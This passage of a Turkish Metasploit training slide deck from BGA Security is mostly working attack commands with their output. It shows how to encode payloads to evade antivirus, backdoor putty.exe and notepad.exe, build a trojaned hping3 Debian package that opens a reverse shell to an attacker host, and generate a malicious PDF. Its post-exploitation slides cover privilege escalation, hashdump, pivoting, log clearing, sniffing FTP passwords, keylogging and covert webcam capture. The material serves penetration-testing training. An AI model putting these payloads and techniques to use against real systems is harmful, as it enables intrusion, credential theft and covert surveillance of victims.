  180. 180. @BGASecurity BGA | MetasploitMeterpreter Varsayılan Meterpreter Komutları ; Komut Açıklama -------- ------------ use Bir veya daha fazla eklenti yüklemek için kullanılır. loadlib İstismar sürecinde yeni bir kütüphane yüklenebilir. read Uzak sistemden veri okur write Uzak sisteme geçerli kanal üzerinden veri yazar close Kanalı kapatır. interact Kanalda interaktif bir oturum başlatır. initcrypt İstemci ve sunucu arasındaki iletişim için bir keyfi şifreleme algoritması oluşturur. ? Yardım neüsü background Geçerli oturumu arkaplana gönder bgkill Arkaplanda çalışan meterpreter scriptini öldür bglist Arkaplanda çalışan scriptleri listele bgrun Meterpreter scriptini arkaplanda çalıştır channel Aktif oturum hakkında bilgi ver. close Aktif oturumu kapat detach Meterpreter oturumunu sonlandır (http/https için) disable_unicode_encoding unicode strings kodlamasını kapat enable_unicode_encoding unicode strings kodlamasını aç exit Tüm meterpreter oturumlarını sonlandır.
  181. 181. @BGASecurity BGA | MetasploitMeterpreter | Temel Komutlar II Temel Komutlar ============= Komut Açıklama ------- ------------- help Yardım menüsü info Bir post module hakkında bilgi ver interact Kanal ile etkileşim irb irb script moduna geç load meterpreter scriptlerini yükle migrate Bir başka prosese bulaş quit meterpreter oturumunu sonlandır read Oturumdan veri oku resource Dosyadan komut dizisi al run Meterpreter script veya post modülü çalıştır use ‘load’ komutu ile aynıdır. write Kanal üzerinden bir veri yazar.
  182. 182. @BGASecurity BGA | MetasploitMeterpreter | Dosya Sistemi Komtuları Stdapi: Dosya Sistemi Komutları ============================ Komut Açıklama ------- ----------- cat Dosyanın içeriğini ekrana okur cd Dizin değiştirir del Dosya siler download Bir dosya veya dizin indirir edit Dosya düzenler getlwd Yerel çalışma dizinini gösterir getwd Çalışma dizinini gösterir lcd Yerel çalışma dizinini değiştirir lpwd Yerel çalışma dizinini gösterir ls Dosyaları listeler
  183. 183. @BGASecurity BGA | MetasploitMeterpreter | Dosya Sistemi Komtuları II Stdapi: Dosya Sistemi Komutları ============================ Komut Açıklama ------- ----------- mkdir Dizin yaratma pwd Çalışma dizinini göster rm Bir dosyayı sil rmdir Dizin sil search Dosyaları arar upload Bir dosya veya dizin yükle
  184. 184. @BGASecurity BGA | MetasploitMeterpreter | Ağ Komutları Ağ Komutları =========================== Komutlar Açıklama ------- ----------- ipconfig Ağ ayarlarlarını görüntüler portfwd Yerel portu uzak bir servise yönlendirir route Yönlendirme tablosunu görüntüler ve değiştirir
  185. 185. @BGASecurity BGA | MetasploitMeterpreter | Sistem Komutları Sistem Komutları ======================= Komutlar Açıklama ------- ----------- clearev Olay loglarını temizle drop_token Herhangi bir etkin kimliğe bürünme belirteci bırakır. execute Komut çalıştırır getpid Geçerli proses tanımlayıcısını göster. getprivs Yetki yükseltme komutlarını göster getuid Sunucuda çalışan kullanıcıyı göster kill Bir prosesi öldür ps Çalışan prosesleri listele
  186. 186. @BGASecurity BGA | MetasploitMeterpreter | Sistem Komutları II Sistem Komutları ======================= Komutlar Açıklama ------- ----------- reboot Uzak bilgisayarı reboot et reg Uzak registery ayarlarını değiştir. rev2self Uzak bilgisayar üzerinde RevertToSelf() arar shell Sistem komut satırına geç shutdown Uzak sistemi kapat steal_token Hedef proses yetkilerine geçiş yapar sysinfo Uzak sistem hakkında detaylı bilgi alır
  187. 187. @BGASecurity BGA | MetasploitMeterpreter | Kullanıcı Arayüzü Komutları Kullanıcı Arayüzü Komutları =============================== Komut Açıklama -------- ----------- enumdesktops Erişilebilir tüm masaüstlerini göster getdesktop Geçerli meterpreter masaüstünü göster idletime Boş vakti gösterir keyscan_dump Klavye girişlerini dump et keyscan_start Klavye girişlerini dinlemeye başla keyscan_stop Klavye girişlerini dinlemeyi durdur screenshot Masaüstünün ekran görüntüsünü al setdesktop Meterpreter geçerli masaüstünü değiştir. uictl Bazı kullanıcı arabirimi bileşenlerini denetler
  188. 188. @BGASecurity BGA | MetasploitMeterpreter | Webcam Komutları Webcam Komutları ======================= Komut Açıklama ------- ----------- record_mic Mikrofonu X saniye kadar dinle webcam_list Webcamlerin listesini ver webcam_snap Webcamden görüntü al
  189. 189. @BGASecurity BGA | MetasploitMeterpreter | Yetki Yükseltme Komutları Priv: Yetki Yükseltme Komutları ====================== Komut Açıklama ------- ----------- getsystem Yerel yetki yükseltme tekniklerini uygula
  190. 190. @BGASecurity BGA | MetasploitMeterpreter | Şifre Veritabanı Komutları Şifre Veritabanı Komutları ================================ Komut Açıklama --------- ----------- hashdump SAM database in içeriğini görüntüler
  191. 191. @BGASecurity BGA | MetasploitMeterpreter | Timestomp Komutları Timestomp Komutları ======================== Komut Açıklama -------- ----------- timestomp Dosya/Dizin izinlerini değiştir
  192. 192. @BGASecurity BGA | MetasploitVNC DLL Inject VNC DLL Inject • Üst düzey payloadlardan biride VNC DLL enjeksiyonudur. RealVNC kodunda değişiklik yapılarak oluşturulmuştur. • Dış dosya, kütüphane, servis kurulumu veya registry anahtarı gerektirmiyor. • Hedef exploit edildikden sonra vnc dll hedefe upload edilir ve tetiklenerek hedefin ekranı masaüstümüze taşınır ve sanki hedef bilgisayarın başındaymışız gibi o bilgisayarı kontrol edebiliriz. Bu payloadı farklı bir örnekle inceleyelim. Hedefin güvenlik zafiyeti olan servisini exploit ederek VNC DLL enjekte edip işlevselliğine bakalım. Oturumu kilitli bir sisteme giriş için; net user <kullanıcı adı> <şifre> /add net localgroup administrators <kullanıcı adı> /add
  193. 193. @BGASecurity BGA | MetasploitVNC DLL Inject Yeni Administrators Kullanıcısı Ekleme
  194. 194. @BGASecurity BGA | MetasploitPassiveX Metasploit Framework’de bulunan üst düzey payload’lardan bir diğeride PassiveX dir. Hedef sistem bir Firewall arkasındaysa ve firewall http protokolünü bloklamadıysa fakat Nat yapıyorsa hedefe yönelik bağlantı girişimi başarısız olacaktır. Bu noktada PassiveX payloadı kullanılarak http protokolü üzerinden ters bağlantı yapılarak firewall aşılır ve hedef ile oturum kurulur. PassiveX payloadı ile süreç şöyle başlar; - PassiveX payload’ı ile hedefin registry kaydı değiştirilir ve İnternet Explorer başlatılır. - İstenen DLL , ActiveX objesi olarak yüklenir. - Tüm iletişim http protokolü üzerinden yapılır. - Meterpreter ve VNC DLL injection injection için kullanılabilir.
  195. 195. @BGASecurity BGA | MetasploitPassiveX PassiveX Payloadları İsim Açıklama -------- ------------ windows/exec/reverse_http Tunnel communication over HTTP and executean arbitrary command windows/shell/reverse_http Tunnel communication over HTTP and spawn piped command shell windows/meterpreter/reverse_http Tunnel communication over HTTP and inject the meterpreter server DLL windows/upexec/reverse_http Tunnel communication over HTTP and uploadan executable and runs it windows/vncinject/reverse_http Tunnel communication over HTTP and inject the VNC server DLL and run it from memory
  196. 196. @BGASecurity BGA | MetasploitMsfencode Msfencode, istenilen payloadın içeriğini değiştirerek Kaçak Giriş Tespit ve Engelleme Sistemleri (IDS/IPS), Güvenlik Duvarları (Firewall) ve Antivirüsler tarafından tanınmasını engeller/zorlaştırır. Metasploit Frameworkde 27+ encoder bulunuyor.Encoderları listelemek için -l paramatresi diğer seçenekler için –h parametresi kullanılır.
  197. 197. @BGASecurity BGA | MetasploitMsfencode • Msfencode Kullanım Parametreleri
  198. 198. @BGASecurity BGA | MetasploitMsfencode Encoder Listesi
  199. 199. @BGASecurity BGA | MetasploitMsfencode • Encoder Kullanımı • Shellcode’u msfpayload ile raw formatında msfencode a aktarıp içeriği encode edebilirsiniz. Metasploit’de bulunan güçlü encoder’lar ile içerik antivirus, content fitler, ids/ips sistemleri tarafından tanınmaz hale getirilebilir. # msfpayload windows/meterpreter/reverse_tcp LHOST=6.6.6.112 LPORT=4443 R | msfencode -e x86/shikata_ga_nai -t exe -o /var/www/payload.exe
  200. 200. @BGASecurity BGA | MetasploitMsfencode • Multi-Encoder Kullanımı • Payload içeriği bir çok encoder ile değiştirilerek yeniden oluşturulabilir. # msfpayload windows/meterpreter/reverse_tcp LHOST=6.6.6.112 LPORT=4443 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode –e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5 –t exe -o /var/www/payload2.exe [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1) [*] x86/shikata_ga_nai succeeded with size 344 (iteration=2) [*] x86/shikata_ga_nai succeeded with size 371 (iteration=3) …..
  201. 201. @BGASecurity BGA | MetasploitMsfrpcd Msfrpcd, msfconsole arayüzünün bir yardımcı aracıdır.Belirtilen ip adresi ve portu dinleyerek gelen bağlatıları kabul eder.Böylelikle uzak sistemden bir veya birden fazla kullanıcının bağlantı kurup metasploit framework ü kullanmasına olanak sağlar. Msfrpcd seçeneklerini görüntülemek için -h parametresini kullanabilirsiniz.
  202. 202. @BGASecurity BGA | MetasploitMsfrpcd Msfrpcd Seçenekleri
  203. 203. @BGASecurity BGA | MetasploitClient-Side Saldırı Yöntemleri Bu bölümün amacı, son kullanıcıya yönelik güncel tehditlerin uygulamalar eşliğinde anlaşılmasıdır.
  204. 204. @BGASecurity BGA | MetasploitClient-Side Saldırı Yöntemleri | İçerik 1. Browser Tabanlı Açıklıklar 2. Binary Payloadlar 3. Antivirüsleri Atlatmak 4. Linux Binary Trojan 5. Java Uygulamalarını Bulaştırmak 6. File Format Exploitler 7. VBScript Enjekte Yöntemleri
  205. 205. @BGASecurity BGA | MetasploitBrowser Tabanlı Açıklıklar • Bir browser exploiti, kötü amaçlı geliştirilmiş zararlı kod parçasıdır. • Kullanıcının bilgisi olmadan, bilgisayarına zararlı yazılım bulaştırmak veya izinsiz/yetkisiz değişikliklerde bulunmak için kullanılır. • Zararlı kod; HTML, Image, Java, Javascript, ActiveX veya başka bir web teknolojisi olabilir. • Zayıflıklar, browser teknolojisinden veya eklentilerinden kaynaklanabilir
  206. 206. @BGASecurity BGA | MetasploitBrowser Tabanlı Açıklıklar Internet Explorer CSS IMPORT
  207. 207. @BGASecurity BGA | MetasploitBrowser Autopwn • Browser tabanlı açıklıkları otomotize eder • Useragent bilgisine göre ilgili exploit ve payloadı oluşturur
  208. 208. @BGASecurity BGA | MetasploitBrowser Autopwn Browser Autopwn; Firefox, IExplorer, Chrome,Opera msf > use auxiliary/server/browser_autopwn msf auxiliary(browser_autopwn) > set LHOST saldirgan.com LHOST => 85.95.238.172 msf auxiliary(browser_autopwn) > set SRVPORT 80 SRVPORT => 80 msf auxiliary(browser_autopwn) > set URIPATH /pwd URIPATH => /pwd msf auxiliary(browser_autopwn) > exploit [*] --- Done, found 23 exploit modules [*] Using URL: http://0.0.0.0:80/pwd [*] Local IP: http://saldirgan.com :80/pwd
  209. 209. @BGASecurity BGA | MetasploitBrowser Autopwn Meterpreter Oturumlarının Listesi
  210. 210. @BGASecurity BGA | MetasploitBinary Payloadlar • Metasploit'de bulunan payload'ları çalıştırılabilir hale getirip, exploit ihtiyacı olmaksızın sisteme bulaştırmak mümkündür. • # ./msfpayload windows/shell_reverse_tcp LHOST=192.168.5.99 LPORT=4443 X > /tmp/reverse.exe
  211. 211. @BGASecurity BGA | MetasploitBinary Payloadlar Dinleme Modu # msfcli exploit/multi/handler PAYLOAD=windows/shell_reverse_tcp LHOST=6.6.6.112 LPORT=4443 E PAYLOAD => windows/shell_reverse_tcp LHOST => 6.6.6.112 LPORT => 4443 [*] Started reverse handler on 6.6.6.112:4443 [*] Starting the payload handler.. 2 +0200 Microsoft Windows [Version 6.1.6801] Copyright (c) 2006 Microsoft Corporation. All rights reserved. C:UsersozanusDesktop>
  212. 212. @BGASecurity BGA | MetasploitBinary Payloadlar Varolan bir exe’yi backdoorlamak. Örnek Uygulama Putty 1. wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe 2. msfpayload windows/meterpreter/reverse_tcp LHOST=6.6.6.112 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 3 -t exe -x /var/www/putty.exe -o /var/www/puttyx.exe 3. msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=6.6.6.112 LPORT=443 E Not: Orijinal program korunsun isteniliyorsa, -k parametresi kullanılır.
  213. 213. @BGASecurity BGA | MetasploitAntivirüsleri Atlatmak • Antivirusler nasıl çalışır ? • İmza tabanlı zararlı analizi
  214. 214. @BGASecurity BGA | MetasploitAntivirüsleri Atlatmak • Template Kullanımı • msfpayload windows/meterpreter/reverse_tcp LHOST=6.6.6.112 LPORT=2222 R | msfencode -t exe -x notepad.exe -k -o notepad2.exe -e x86/shikata_ga_nai -c 5 • Antivirus tarama sonucu
  215. 215. @BGASecurity BGA | MetasploitAntivirüsleri Atlatmak Notepad.exe dosyasının imzasını taklit etmiş olduk, son oluşturduğumuz notepadplus.exe reverse shell dosyasının özellikleri
  216. 216. @BGASecurity BGA | MetasploitLinux Binary Trojan • mkdir siginak;cd siginak • apt-get --download-only install hping3 • mv /var/cache/apt/archives/hping3_20051105-bt2_i386.deb . • dpkg -x hping3_20051105-bt2_i386.deb work • mkdir work/DEBIAN • cat > work/DEBIAN/contol Package: hping3 Version: 3.1.1 Section: Packet Generator Priority: optional Architecture: i386 Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com) Description: Cok dehset paket gonderen versiyonudur.
  217. 217. @BGASecurity BGA | MetasploitLinux Binary Trojan • cat > work/DEBIAN/postinst #!/bin/sh sudo chmod 2755 /usr/sbin/hping3 & • # msfpayload linux/x86/shell/reverse_tcp LHOST=6.6.6.112 LPORT=4443 X > work/usr/sbin/hping3 Created by msfpayload (http://www.metasploit.com). Payload: linux/x86/shell/reverse_tcp Length: 50 Options: {"LHOST"=>"6.6.6.112", "LPORT"=>"4443"} • chmod 755 work/DEBIAN/postinst • dpkg-deb --build work • mv work.deb hping3.deb • msfcli exploit/multi/handler PAYLOAD=linux/x86/shell/reverse_tcp LHOST=6.6.6.112 LPORT=4443 E
  218. 218. @BGASecurity BGA | MetasploitLinux Binary Trojan
  219. 219. @BGASecurity BGA | MetasploitFile Format Exploit Adobe Reader msf > use exploit/windows/fileformat/adobe_geticon msf exploit(adobe_geticon) > set FILENAME belge.pdf FILENAME => belge.pdf msf exploit(adobe_geticon) > exploit [*] Creating 'belge.pdf' file... [+] belge.pdf stored at /var/www/belge.pdf
  220. 220. @BGASecurity BGA | MetasploitFile Format Exploit Microsoft Word RTF pFragments Stack Buffer Overflow (File Format) • Microsoft office 2010, 2007 ve 2003 sürümlerini etkileyen ve gelişi güzel kod çalıştırmayı sağlayan açıklık.
  221. 221. @BGASecurity BGA | MetasploitExploit Sonrası Sistemde İlerleme Post exploitation olarak da adlandırılır. Amaç herhangi bir güvenlik zafiyeti kullanarak sisteme gerçekleştirilen yetkisiz, düşük yetkili bir kullanıcı haklarıyla sistemi ele geçirme, sistemi ara geçit olarak kullanarak başka sistemlere atlama. Bu bölüm, exploit sonrası uzak sistemde ilerleme,gizleme ve kayıtları silme yöntemlerinin anlaşışması ve uygulanmasını içerir.
  222. 222. @BGASecurity BGA | Metasploitİçerik 1. Yetki Yükseltme 2. Hashdump 3. Parola Kırma (jonh the ripper) 4. Başka Bir Uygulamaya Bulaşmak 5. Pivoting 6. Memorydump 7. Uzak Masaüstü Bağlantısı Başlatmak 8. Hedefin Canlı Oturumuna Geçiş 9. İz Temizleme 10. Trafik Dinleme (Packet Sniffing) 11. Ekran Görüntüsü Yakalama 12. Ses, Webcam Görüntüsünü Yakalama
  223. 223. @BGASecurity BGA | MetasploitYetki Yükseltme Hedef sistem, kisitli kullanici yetkileri ile ele geçirildiginde yetki yükseltmek ve farkli kullanici yetkilere geçiş yapmak.
  224. 224. @BGASecurity BGA | MetasploitYetki Yükseltme meterpreter > getsystem Local privilege escalation teknikleri ile SYSTEM yetkilerine yükseltir. meterpreter > getsystem -t 1 …got system (via technique 1). meterpreter > getuid Server username: NT AUTHORITYSYSTEM
  225. 225. @BGASecurity BGA | MetasploitYetki Yükseltme meterpreter > getsystem -h Usage: getsystem [options] Attempt to elevate your privilege to that of local system. OPTIONS: -h Help Banner. -t The technique to use. (Default to ‘0ʹ). 0 : All techniques available 1 : Service – Named Pipe Impersonation (In Memory/Admin) 2 : Service – Named Pipe Impersonation (Dropper/Admin) 3 : Service – Token Duplication (In Memory/Admin) 4 : Exploit – KiTrap0D (In Memory/User)
  226. 226. @BGASecurity BGA | MetasploitHasdump Windows sistemlerde SAM database’inden kullanıcı hesaplarını ve LM/NTML password hashlerini alır.
  227. 227. @BGASecurity BGA | MetasploitPassword Cracking | John The Ripper
  228. 228. @BGASecurity BGA | MetasploitMigrate • Meterpreter ajanı çalışan başka bir uygulamaya kendini bulaştırabilir ve o uygulama üzerinden yetkisiz işlevler gerçekleştirebilir. • Uygulamaya bulaştığında uygulamanın boyutu değişmez • Antivirus, Antilogger bypass için tercih edilir. • Proxy Auth. Bypass etmek için kullanılır.
  229. 229. @BGASecurity BGA | MetasploitMigrate • Kullanımı meterpreter > migrate Usage: migrate pid • “ps” komutu ile çalışan processlerin id si öğrenilebilir. meterpreter > ps PID Name Arch Session User Path --- ---- ---- ------- ---- ---- 860 explorer.exe x86 1 pentestlabsozanus C:WindowsExplorer.EXE
  230. 230. @BGASecurity BGA | MetasploitMigrate meterpreter > migrate 860 [*] Migrating to 860... [*] Migration completed successfully. meterpreter > getuid Server username: pentestlabsozanus
  231. 231. @BGASecurity BGA | MetasploitPivoting • Uzak ağı, dış dünyaya açmak için kullanılır. • Firewall/NAT veya Router arkasındaki sistemlere erişmek için tercih edilir. • Port yönlendirme yapılabilir. • Uzak ağ ile VPN tuneli kurulabilir.
  232. 232. @BGASecurity BGA | MetasploitPivoting | Portfwd
  233. 233. @BGASecurity BGA | MetasploitPivoting | Portfwd meterpreter > portfwd -h Usage: portfwd [-h] [add | delete | list | flush] [args] OPTIONS: -L <opt> The local host to listen on (optional). -h Help banner. -l <opt> The local port to listen on. -p <opt> The remote port to connect to. -r <opt> The remote host to connect to. meterpreter > portfwd add -l 3389 -p 3333 -r 127.0.0.1 [*] Local TCP relay created: 0.0.0.0:3389 <-> 127.0.0.1:3333
  234. 234. @BGASecurity BGA | MetasploitPivoting | Route • Uzak ağdaki diğer ip adreslerine erişmek için kullanılır. • VPN tuneline benzetilebilir.
  235. 235. @BGASecurity BGA | MetasploitPivoting | Route msf > route -h Usage: route [add/remove/get/flush/print] subnet netmask [comm/sid] Route traffic destined to a given subnet through a supplied session. The default comm is Local. msf > route add 1.1.1.0 255.255.255.0 1 [*] Route added msf > route print Active Routing Table ==================== Subnet Netmask Gateway ------ ------- ------- 1.1.1.0 255.255.255.0 Session 1
  236. 236. @BGASecurity BGA | MetasploitUzak Masaüstü Bağlantısı Hedef sistemin uzak masaüstü servisini (rdp) aktif etmek ve yetkili bir rdp kullanıcı eklenerek uzak sistem ele geçirilebilir.
  237. 237. @BGASecurity BGA | MetasploitHedefin Canlı Oturumuna Geçiş VNC ile hedefin canlı oturumuna geçiş
  238. 238. @BGASecurity BGA | Metasploitİz Temizleme Windows Loglarını Silme
  239. 239. @BGASecurity BGA | MetasploitTrafik Dinleme (Packet Sniffing) • Exploiting sonrası hedef sistemde ilerleme aşamasında trafik kayıtları önemli veriler içerebilir. • Uzak bir sistem ele geçirildiğinde, hedef sistemde ilerlemek için elde edilecek kritik verilerden biride network trafiğidir. • Ele geçirilen sistemin üzerinden ftp,http,smtp,pop3 vb. trafiği akıyor ve şifre içeriyor olabilir. Meterpreter ajanının sniffing özelliği ile, uzak sistemin ağ kartını dinleyerek trafiği kaydedebilirsiniz.
  240. 240. @BGASecurity BGA | MetasploitTrafik Dinleme (Packet Sniffing) meterpreter > use sniffer Sniffer Komutları ================ Command Description ------- ----------- sniffer_dump Retrieve captured packet data to PCAP file sniffer_interfaces Enumerate all sniffable network interfaces sniffer_start Start packet capture on a specific interface sniffer_stats View statistics of an active capture sniffer_stop Stop packet capture on a specific interface
  241. 241. @BGASecurity BGA | MetasploitTrafik Dinleme (Packet Sniffing) Komut açıklamaları; sniffer_dump: Yakalanan trafiği dosya olarak kaydeder. sniffer_interfaces: Ağ arabirimlerinin listesini verir. sniffer_start: Belirtilen ağ arabirimi için paket yakalamaya başlar sniffer_stats: Aktif sniffing için istatistlik sunar sniffer_stop: Belirtilen ağ arabirimi için dinlemeyi sonlandırır.
  242. 242. @BGASecurity BGA | MetasploitTrafik Dinleme (Packet Sniffing) • Hedef sistemdeki ağ arabirimlerinin listesini ver, meterpreter > sniffer_interfaces 1 - 'Intel(R) PRO/1000 MT Network Connection' ( type:0 mtu:1514 usable:true dhcp:false wifi:false ) • 1 numaralı ağ arabirimini dinle, 20000 paket yakala meterpreter > sniffer_start 1 20000 [*] Capture started on interface 1 (20000 packet buffer) • Sniffing durumunu gözlemlemek için; meterpreter > sniffer_stats 1 [*] Capture statistics for interface 1 packets: 5605 bytes: 569713
  243. 243. @BGASecurity BGA | MetasploitTrafik Dinleme (Packet Sniffing) • Yakalanan trafiği diske kaydet meterpreter > sniffer_dump 1 /tmp/win2.cap [*] Flushing packet capture buffer for interface 1... [*] Flushed 6044 packets (741732 bytes) [*] Download completed, converting to PCAP... [*] PCAP file written to /tmp/win2.cap • Sniffing işlemini durdur meterpreter > sniffer_stop 1 [*] Capture stopped on interface 1
  244. 244. @BGASecurity BGA | MetasploitTrafik Dinleme (Packet Sniffing) # tshark -r /tmp/win2.cap -R ftp 1182 15.000000 89.19.25.155 -> 1.1.1.101 FTP 96 Response: 220-FileZilla Server version 0.9.24 beta 1183 15.000000 89.19.25.155 -> 1.1.1.101 FTP 99 Response: 220-written by Tim Kosse (Tim.Kosse@gmx.de) 1184 15.000000 89.19.25.155 -> 1.1.1.101 FTP 115 Response: 220 Please visit http://sourceforge.net/projects/filezilla/ 1187 15.000000 1.1.1.101 -> 89.19.25.155 FTP 69 Request: USER ozanucar 1188 15.000000 89.19.25.155 -> 1.1.1.101 FTP 90 Response: 331 Password required for ozanucar 1189 15.000000 1.1.1.101 -> 89.19.25.155 FTP 78 Request: PASS benimgizliparolam
  245. 245. @BGASecurity BGA | MetasploitSes, Webcam Görüntüsünü Yakalama Hedef bilgisayarada bağlı bir webcam varsa, gizlice ortamdan görüntü almayı sağlar. Webcam görüntüsünü almak için “webcam_snap“ komutu; meterpreter > webcam_list 1: Acer Crystal Eye webcam meterpreter > webcam_snap [*] Starting... [+] Got frame [*] Stopped Webcam shot saved to: /opt/framework3/msf3/VHBWSraf.jpeg
  246. 246. @BGASecurity BGA | MetasploitCanlı Webcam Görüntüsü • Hedefin webcam’inden canlı olarak görüntü almak için • meterpreter > run webcam -p /tmp/ [*] Starting webcam 1: Acer Crystal Eye webcam [*] View live stream at: /tmp//webcam.htm [*] Image saved to : /tmp//webcam.jpg
  247. 247. @BGASecurity BGA | MetasploitCanlı Webcam Görüntüsü
  248. 248. @BGASecurity BGA | MetasploitDosya / Dizin İşlemleri • Hangi dizindeyim (pwd) ? • C: Dizinine geçmek istiyorum (cd C:) • C:dizininde neler var (ls) …
  249. 249. @BGASecurity BGA | MetasploitDosya / Dizin İşlemleri • Hedef sisteme, istenilen casus bir yazılım veya belge/dosya yüklenebilir. • Hedefin C: dizinine klogger.exe dosyasını upload et;
  250. 250. @BGASecurity BGA | MetasploitHedef Sistemde İçerik Arama • Hedefte bir dosya türü veya ismi aramak için “search” komutu kullanılabilinir. Tüm ofis dökümanlarını aramak için; meterpreter > search -f *.doc
  251. 251. @BGASecurity BGA | MetasploitWmap • Web uygulamalarına yönelik çeşitli kontroller gerçekleştirir. • Tarama sonuçlarını kaydetmek için veritabanı oluşturmak gerekir.
  252. 252. @BGASecurity BGA | MetasploitWmap | load_wmap Wmap sonuçlarını kaydetmek için database oluşturmak ve wmap modülünün aktif edilmesi
  253. 253. @BGASecurity BGA | MetasploitWmap | wmap_sites
  254. 254. @BGASecurity BGA | MetasploitWmap | wmap_run -e Wmap modüllerinin uygulanması
  255. 255. @BGASecurity BGA | Metasploit @BGASecurity -Teşekkürler- bgasecurity.com | @bgasecurity

×